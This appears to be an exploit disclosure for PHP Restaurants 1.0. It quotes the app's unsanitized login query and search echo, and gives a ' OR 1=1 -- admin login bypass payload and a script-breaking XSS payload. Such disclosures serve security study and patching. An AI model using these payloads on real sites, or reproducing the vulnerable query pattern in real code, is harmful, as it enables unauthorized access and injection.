## https://sploitus.com/exploit?id=1337DAY-ID-38635
# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
functions.php
function login(){
global $conn;
$email = $_POST['email'];
$pw = $_POST['password'];
$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =
'".md5($pw)."'"; <-- there is No filter to secure sql query
parm[email][password]
$result = $conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
header('location: index.php');
}
} else {
header('location: login.php?m=Wrong Password');
}
}
login bypass at admin page /rest1/admin/login.php
email & password : ' OR 1=1 -- <- add [space] end of the payload
cross site scripting main page /index.php
xhttp.open("GET", "functions.php?f=getRestaurants<?php
if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we
can insert our xss payload
?>
", true);
xhttp.send();
</script> <-- when you insert your'e payload don't forget to add </script>
like
xss payload : </script><img onerror=alert(1) src=a>